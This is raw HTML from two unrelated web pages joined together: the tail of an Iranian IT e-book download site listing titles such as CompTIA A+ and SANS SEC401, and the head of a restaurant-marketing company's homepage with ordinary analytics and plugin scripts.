class="featured featured-type-featured-image"> <a title="CompTIA A+ Complete Review Guide: Exam Core 1 220-1001 and Exam Core 2 220-1002, 4th" data-src="https://technet24.ir/wp-content/uploads/2019/04/CompTIA-A-Complete-Review-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;CompTIA-A-Complete-Review-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-86x64.jpg&quot;,&quot;210&quot;:&quot;CompTIA-A-Complete-Review-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-210x136.jpg&quot;,&quot;279&quot;:&quot;CompTIA-A-Complete-Review-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-279x220.jpg&quot;,&quot;357&quot;:&quot;CompTIA-A-Complete-Review-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf-357x210.jpg&quot;,&quot;750&quot;:&quot;CompTIA-A-Complete-Review-Guide-Exam-Core-1-220-1001-and-Exam-Core-2-220-1002-4th-Edition-pdf.jpg&quot;}}" class="img-holder" href="https://technet24.ir/comptia-a-complete-review-guide-exam-core-1-220-1001-and-exam-core-2-220-1002-4th-18813"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/comptia-a-complete-review-guide-exam-core-1-220-1001-and-exam-core-2-220-1002-4th-18813" title="CompTIA A+ Complete Review Guide: Exam Core 1 220-1001 and Exam Core 2 220-1002, 4th"> <span class="post-title"> CompTIA A+ Complete Review Guide: Exam Core 1 220-1001 and&hellip; </span> </a> </h2></div> </article > <article class="post-18802 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Linux Firewalls &#8211; آموزش فایروال لینوکس" data-src="https://technet24.ir/wp-content/uploads/2019/04/Linux-Firewalls_Pdf-Download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Linux-Firewalls_Pdf-Download-86x64.jpg&quot;,&quot;210&quot;:&quot;Linux-Firewalls_Pdf-Download-210x136.jpg&quot;,&quot;279&quot;:&quot;Linux-Firewalls_Pdf-Download-279x220.jpg&quot;,&quot;357&quot;:&quot;Linux-Firewalls_Pdf-Download-357x210.jpg&quot;,&quot;750&quot;:&quot;Linux-Firewalls_Pdf-Download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/linux-firewalls-pdf-18802"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/linux-firewalls-pdf-18802" title="Linux Firewalls &#8211; آموزش فایروال لینوکس"> <span class="post-title"> Linux Firewalls &#8211; آموزش فایروال لینوکس </span> </a> </h2></div> </article > <article class="post-18797 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Docker Cookbook &#8211; Second Edition" data-src="https://technet24.ir/wp-content/uploads/2019/04/Docker-Cookbook-Second-Edition-pdf-download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Docker-Cookbook-Second-Edition-pdf-download-86x64.jpg&quot;,&quot;210&quot;:&quot;Docker-Cookbook-Second-Edition-pdf-download-210x136.jpg&quot;,&quot;279&quot;:&quot;Docker-Cookbook-Second-Edition-pdf-download-279x220.jpg&quot;,&quot;357&quot;:&quot;Docker-Cookbook-Second-Edition-pdf-download-357x210.jpg&quot;,&quot;750&quot;:&quot;Docker-Cookbook-Second-Edition-pdf-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/docker-cookbook-pdf-18797"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/docker-cookbook-pdf-18797" title="Docker Cookbook &#8211; Second Edition"> <span class="post-title"> Docker Cookbook &#8211; Second Edition </span> </a> </h2></div> </article > <article class="post-18786 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-94"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="SANS SEC401 Security Essentials Bootcamp Style" data-src="https://technet24.ir/wp-content/uploads/2019/04/SANS-SEC401-Security-Essentials-Bootcamp-Style-download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;SANS-SEC401-Security-Essentials-Bootcamp-Style-download-86x64.jpg&quot;,&quot;210&quot;:&quot;SANS-SEC401-Security-Essentials-Bootcamp-Style-download-210x136.jpg&quot;,&quot;279&quot;:&quot;SANS-SEC401-Security-Essentials-Bootcamp-Style-download-279x220.jpg&quot;,&quot;357&quot;:&quot;SANS-SEC401-Security-Essentials-Bootcamp-Style-download-357x210.jpg&quot;,&quot;750&quot;:&quot;SANS-SEC401-Security-Essentials-Bootcamp-Style-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/sans-sec401-security-essentials-bootcamp-style-18786"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/sans-sec401-security-essentials-bootcamp-style-18786" title="SANS SEC401 Security Essentials Bootcamp Style"> <span class="post-title"> SANS SEC401 Security Essentials Bootcamp Style </span> </a> </h2></div> </article > <article class="post-18777 type-post format-standard has-post-thumbnail listing-item listing-item-thumbnail listing-item-tb-2 main-term-100"> <div class="item-inner clearfix"> <div class="featured featured-type-featured-image"> <a title="Preventing Ransomware &#8211; باج افزار و روش های پیشگیری از آن" data-src="https://technet24.ir/wp-content/uploads/2019/04/Preventing-Ransomware-pdf-download-210x136.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/04\/&quot;,&quot;sizes&quot;:{&quot;86&quot;:&quot;Preventing-Ransomware-pdf-download-86x64.jpg&quot;,&quot;210&quot;:&quot;Preventing-Ransomware-pdf-download-210x136.jpg&quot;,&quot;279&quot;:&quot;Preventing-Ransomware-pdf-download-279x220.jpg&quot;,&quot;357&quot;:&quot;Preventing-Ransomware-pdf-download-357x210.jpg&quot;,&quot;750&quot;:&quot;Preventing-Ransomware-pdf-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/preventing-ransomware-18777"></a> </div> <h2 class="title"> <a class="post-url" href="https://technet24.ir/preventing-ransomware-18777" title="Preventing Ransomware &#8211; باج افزار و روش های پیشگیری از آن"> <span class="post-title"> Preventing Ransomware &#8211; باج افزار و روش های پیشگیری از&hellip; </span> </a> </h2></div> </article > </div> </div><div class="bs-slider-controls main-term-100"></div></div></div></div></div></div></div> </div> </div><!-- .content-column --> </div> </main><!-- main --> <footer id="site-footer" class="site-footer full-width"> <div class="copy-footer"> <div class="content-wrap"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div id="menu-footer" class="menu footer-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <nav class="footer-menu-container"> <ul id="footer-navigation" class="footer-menu menu clearfix"> <li id="menu-item-322" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-312 current_page_item better-anim-fade menu-item-322"><a href="https://technet24.ir/" aria-current="page">Home</a></li> <li id="menu-item-12839" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-129 better-anim-fade menu-item-12839"><a href="https://technet24.ir/category/%d8%b4%d8%a8%da%a9%d9%87">Network</a></li> <li id="menu-item-12840" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-2398 better-anim-fade menu-item-12840"><a href="https://technet24.ir/category/videos">Video</a></li> <li id="menu-item-12841" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-94 better-anim-fade menu-item-12841"><a href="https://technet24.ir/category/download">Download</a></li> <li id="menu-item-13155" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-13155"><a href="https://technet24.ir/contact-us">Contact US</a></li> </ul> </nav> </div> </div> </div> <div class="row footer-copy-row"> <div class="copy-1 col-lg-6 col-md-6 col-sm-6 col-xs-12"> © کپی بخش یا کل هر کدام از مطالب تک نت24 تنها با لینک به سایت امکان پذیر است.<br> © مفتخریم اعلام کنیم که تعرفه ترافیک وب‌سایت تک‌نت24 به صورت نیم بها محاسبه می‌شود.<br> © 2019 - آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت. All Rights Reserved. Powered By <a href="https://Servervds.com">Servervds</a> </div> <div class="copy-2 col-lg-6 col-md-6 col-sm-6 col-xs-12"> <a href="https://technet24.ir">Technet24</a> </div> </div> </div> </div> </div> </footer><!-- .footer --> </div><!-- .main-wrap --> <span class="back-top"><i class="fa fa-arrow-up"></i></span> <script type='text/javascript'> /* <![CDATA[ */ var bs_pagination_loc = {"loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>"}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var betterReviewsLoc = {"ajax_url":"https:\/\/technet24.ir\/wp-admin\/admin-ajax.php","cp":"\/"}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var publisher_theme_global_loc = {"page":{"boxed":"full-width"},"header":{"style":"style-2","boxed":"boxed"},"ajax_url":"https:\/\/technet24.ir\/wp-admin\/admin-ajax.php","loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>","translations":{"tabs_all":"All","tabs_more":"More","lightbox_expand":"Expand the image","lightbox_close":"Close"},"lightbox":{"not_classes":""},"main_menu":{"more_menu":"enable"},"skyscraper":{"sticky_gap":30,"sticky":true,"position":"after-header"},"share":{"more":true},"refresh_googletagads":"1","notification":{"subscribe_msg":"By clicking the subscribe button you will never miss the new articles!","subscribed_msg":"You're subscribed to notifications","subscribe_btn":"Subscribe","subscribed_btn":"Unsubscribe"}}; var publisher_theme_ajax_search_loc = {"ajax_url":"https:\/\/technet24.ir\/wp-admin\/admin-ajax.php","previewMarkup":"<div class=\"ajax-search-results-wrapper ajax-search-no-product ajax-search-fullwidth\">\n\t<div class=\"ajax-search-results\">\n\t\t<div class=\"ajax-ajax-posts-list\">\n\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t<span>\u0645\u0637\u0627\u0644\u0628\u200c\u0647\u0627<\/span>\n\t\t\t<\/div>\n\t\t\t<div class=\"posts-lists\" data-section-name=\"posts\"><\/div>\n\t\t<\/div>\n\t\t<div class=\"ajax-taxonomy-list\">\n\t\t\t<div class=\"ajax-categories-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>\u062f\u0633\u062a\u0647 \u0628\u0646\u062f\u06cc \u0647\u0627<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"categories\"><\/div>\n\t\t\t<\/div>\n\t\t\t<div class=\"ajax-tags-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>\u0628\u0631\u0686\u0633\u0628 \u0647\u0627<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"tags\"><\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>","full_width":"1"}; /* ]]> */ </script> <!--[if lt IE 9]> <script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/ace/1.2.8/ext-old_ie.js'></script> <![endif]--> <div class="rh-cover noscroll gr-3 no-login-icon" > <span class="rh-close"></span> <div class="rh-panel rh-pm"> <div class="rh-p-h"> </div> <div class="rh-p-b"> <div class="rh-c-m clearfix"></div> <form role="search" method="get" class="search-form" action="https://technet24.ir"> <input type="search" class="search-field" placeholder="جستجو..." value="" name="s" title="جستجو برای:" autocomplete="off"> </form> </div> </div> </div> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/technet24.ir\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://technet24.ir/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://technet24.ir/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://technet24.ir/wp-content/plugins/better-adsmanager/js/advertising.min.js?ver=1.18.0'></script> <script type='text/javascript' src='https://technet24.ir/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.5.5'></script> <script type='text/javascript' async="async" src='https://technet24.ir/wp-content/bs-booster-cache/b808befc47b03f7308666faac91c1c1b.js?ver=5.2'></script> <script> var tzov=function(a){"use strict";return{init:function(){0==tzov.ads_state()&&tzov.blocked_ads_fallback()},ads_state:function(){return void 0!==window.better_ads_adblock},blocked_ads_fallback:function(){var t={};a(".tzov-container").each(function(){if("image"==a(this).data("type"))return 0;t[a(this).data("adid")]={element_id:a(this).attr("id"),ad_id:a(this).data("adid")}}),0!=t.length&&jQuery.ajax({url:'https://technet24.ir/wp-admin/admin-ajax.php',type:"POST",data:{action:"better_ads_manager_blocked_fallback",ads:t},success:function(t){var e=JSON.parse(t);a.each(e.ads,function(t,e){a("#"+e.element_id).html(e.code)})}})}}}(jQuery);jQuery(document).ready(function(){tzov.init()}); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" xmlns:fb="https://www.facebook.com/2008/fbml" xmlns:addthis="https://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel="pingback" href="https://website.thatsbiz.com/xmlrpc.php" /> <script type="text/javascript"> document.documentElement.className = 'js'; </script> <script>var et_site_url='https://website.thatsbiz.com';var et_post_id='3901';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))} </script><title>That&#039;s Biz - Learn About Our Restaurant Marketing Services Here</title> <!-- This site is optimized with the Yoast SEO plugin v11.1.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Interested in effectively marketing restaurants, chains, or bars. That&#039;s Biz has the tools, systems and expertise to help you. Learn more."/> <link rel="canonical" href="https://website.thatsbiz.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="That&#039;s Biz - Learn About Our Restaurant Marketing Services Here" /> <meta property="og:description" content="Interested in effectively marketing restaurants, chains, or bars. That&#039;s Biz has the tools, systems and expertise to help you. Learn more." /> <meta property="og:url" content="https://website.thatsbiz.com/" /> <meta property="og:site_name" content="That&#039;s Biz" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Interested in effectively marketing restaurants, chains, or bars. That&#039;s Biz has the tools, systems and expertise to help you. Learn more." /> <meta name="twitter:title" content="That&#039;s Biz - Learn About Our Restaurant Marketing Services Here" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://website.thatsbiz.com/#organization","name":"","url":"https://website.thatsbiz.com/","sameAs":[]},{"@type":"WebSite","@id":"https://website.thatsbiz.com/#website","url":"https://website.thatsbiz.com/","name":"That&#039;s Biz","publisher":{"@id":"https://website.thatsbiz.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://website.thatsbiz.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://website.thatsbiz.com/#webpage","url":"https://website.thatsbiz.com/","inLanguage":"en-US","name":"That&#039;s Biz - Learn About Our Restaurant Marketing Services Here","isPartOf":{"@id":"https://website.thatsbiz.com/#website"},"about":{"@id":"https://website.thatsbiz.com/#organization"},"datePublished":"2018-05-10T16:14:44+00:00","dateModified":"2019-05-15T18:28:23+00:00","description":"Interested in effectively marketing restaurants, chains, or bars. That's Biz has the tools, systems and expertise to help you. Learn more."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s7.addthis.com' /> <link rel='dns-prefetch' href='//a.opmnstr.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel='dns-prefetch' href='//www.youtube.com' /> <link rel="alternate" type="application/rss+xml" title="That&#039;s Biz &raquo; Feed" href="https://website.thatsbiz.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="That&#039;s Biz &raquo; Comments Feed" href="https://website.thatsbiz.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/website.thatsbiz.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <meta content="Divi v.3.22.7" name="generator"/><style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='jquery.prettyphoto-css' href='https://website.thatsbiz.com/wp-content/plugins/wp-video-lightbox/css/prettyPhoto.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='video-lightbox-css' href='https://website.thatsbiz.com/wp-content/plugins/wp-video-lightbox/wp-video-lightbox.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://website.thatsbiz.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.6.2' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://website.thatsbiz.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.6.2' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://website.thatsbiz.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.6.2' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='wc-gateway-ppec-frontend-cart-css' href='https://website.thatsbiz.com/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/assets/css/wc-gateway-ppec-frontend-cart.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='divi-style-css' href='https://website.thatsbiz.com/wp-content/themes/Divi/style.css?ver=3.22.7' type='text/css' media='all' /> <link rel='stylesheet' id='et-builder-googlefonts-cached-css' href='https://fonts.googleapis.com/css?family=Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic&#038;ver=4.9.10#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='addthis_all_pages-css' href='https://website.thatsbiz.com/wp-content/plugins/addthis/frontend/build/addthis_wordpress_public.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://website.thatsbiz.com/wp-includes/css/dashicons.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='rpt-css' href='https://website.thatsbiz.com/wp-content/plugins/responsive-pricing-table-pro/css/rpt_style.min.css?ver=4.9.10' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://website.thatsbiz.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://website.thatsbiz.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://website.thatsbiz.com/wp-content/plugins/wp-video-lightbox/js/jquery.prettyPhoto.min.js?ver=3.1.6'></script> <script type='text/javascript'> /* <![CDATA[ */ var vlpp_vars = {"prettyPhoto_rel":"wp-video-lightbox","animation_speed":"fast","slideshow":"5000","autoplay_slideshow":"false","opacity":"0.80","show_title":"true","allow_resize":"true","allow_expand":"true","default_width":"640","default_height":"480","counter_separator_label":"\/","theme":"pp_default","horizontal_padding":"20","hideflash":"false","wmode":"opaque","autoplay":"true","modal":"false","deeplinking":"false","overlay_gallery":"true","overlay_gallery_max":"30","keyboard_shortcuts":"true","ie6_fallback":"true"}; /* ]]> */ </script> <script type='text/javascript' src='https://website.thatsbiz.com/wp-content/plugins/wp-video-lightbox/js/video-lightbox.js?ver=3.1.6'></script> <script type='text/javascript' src='https://website.thatsbiz.com/wp-admin/admin-ajax.php?action=addthis_global_options_settings&#038;ver=4.9.10'></script> <script type='text/javascript' src='https://s7.addthis.com/js/300/addthis_widget.js?ver=4.9.10#pubid=dgonynor'></script> <script type='text/javascript' data-cfasync="false" id="omapi-script" async="async" src='https://a.opmnstr.com/app/js/api.min.js'></script> <link rel='https://api.w.org/' href='https://website.thatsbiz.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://website.thatsbiz.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://website.thatsbiz.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://website.thatsbiz.com/' /> <link rel="alternate" type="application/json+oembed" href="https://website.thatsbiz.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwebsite.thatsbiz.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://website.thatsbiz.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwebsite.thatsbiz.com%2F&#038;format=xml" /> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5462GZH');</script> <!-- End Google Tag Manager --> <meta name="google-site-verification" content="aDGg6tjAXe9IdDRMFejDsOpmNDEPisF7Vjw0o6E4DVM" /><!-- Starting: WooCommerce Conversion Tracking (https://wordpress.org/plugins/woocommerce-conversion-tracking/) --> <script> !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '160592031298098', {});fbq('track', 'PageView', {}); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=160592031298098&ev=PageView&noscript=1" /></noscript> <script type="text/javascript"> jQuery(function($) { $(document).on('added_to_cart', function (event, fragments, hash, button) { fbq('track', 'AddToCart', { content_ids: [ $(button).data('product_id') ], content_type: 'product', }); }); }); </script> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-818084525"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments)}; gtag('js', new Date()); gtag('config', 'AW-818084525'); </script> <!-- End: WooCommerce Conversion Tracking Codes --> <script> WP_VIDEO_LIGHTBOX_VERSION="1.8.8"; WP_VID_LIGHTBOX_URL="https://website.thatsbiz.com/wp-content/plugins/wp-video-lightbox"; function wpvl_paramReplace(name, string, value) { // Find the param with regex // Grab the first character in the returned string (should be ? or &) // Replace our href string with our new value, passing on the name and delimeter var re = new RegExp("[\?&]" + name + "=([^&#]*)"); var matches = re.exec(string); var newString; if (matches === null) { // if there are no params, append the parameter newString = string + '?' + name + '=' + value; } else { var delimeter = matches[0].charAt(0); newString = string.replace(re, delimeter + name + "=" + value); } return newString; } </script><style type="text/css">dd ul.bulleted { float:none;clear:both; }</style><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="shortcut icon" href="https://website.thatsbiz.com/wp-content/uploads/2014/12/biz_16.jpg" /> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','//connect.facebook.net/en_US/fbevents.js'); fbq('init', '545230945640036'); fbq('track', "PageView");</script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=545230945640036&amp;ev=PageView&amp;noscript=1"></noscript> <!-- End Facebook Pixel Code --> <!-- Salesflare tracking --> <script src="https://storage.googleapis.com/lib.salesflare.com/discuss.js/dist/discuss.js"></script> <!-- XDStore uses easyXDM which uses json --> <script type="text/javascript" src="https://storage.googleapis.com/lib.salesflare.com/easyXDM-2.4.19.3/easyXDM.min.js"></script> <script type="text/javascript"> easyXDM.DomHelper.requiresJSON("https://storage.googleapis.com/lib.salesflare.com/easyXDM-2.4.19.3/json2.js"); </script> <script type="text/javascript" src="https://storage.googleapis.com/lib.salesflare.com/xdstore.js/XDStore.js"></script> <script src="https://storage.googleapis.com/track.salesflare.com/flare.js"></script> <script> var flare = new Flare(); flare.track("xoPrS1geUNuuE8uVSurPRqXLk7k2lWzqXc20yAWZoVyH1"); </script><link rel="stylesheet" id="et-divi-customizer-global-cached-inline-styles" href="https://website.thatsbiz.com/wp-content/cache/et/global/et-divi-customizer-global-15579449175982.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /><noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript></head> <body data-rsssl=1 class="home page-template-default page page-id-3901 woocommerce-no-js et_pb_button_helper_class et_fixed_nav et_show_nav et_cover_background et_secondary_nav_enabled et_pb_gutter osx et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns4 et_header_style_left et_pb_pagebuilder_layout et_right_sidebar et_divi_theme et-db et_minified_js et_minified_css"> <div id="page-container"> <div id="top-header"> <div class="container clearfix"> <div id="et-info"> <span id="et-info-phone">(833) 429-1680</span> <a href="mailto:[email protected]"><span id="et-info-email">[email protected]</span></a> </div> <!-- #et-info --> <div id="et-secondary-menu"> <a href="https://website.thatsbiz.com/cart/" class="et-cart-info"> <span>0 Items</span> </a> </div> <!-- #et-secondary-menu --> </div> <!-- .container --> </div> <!-- #top-header --> <header id="main-header" data-height-onload="66"> <div class="container clearfix et_menu_container"> <div class="logo_container"> <span class="logo_helper"></span> <a href="https://website.thatsbiz.com/"> <img src="https://website.thatsbiz.com/wp-content/uploads/2014/12/thats_biz_300-300x97.jpg" alt="That&#039;s Biz" id="logo" data-height-percentage="54" /> </a> </div> <div id="et-top-navigation" data-height="66" data-fixed-height="40"> <nav id="top-menu-nav"> <ul id="top-menu" class="nav"><li id="menu-item-3878" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children 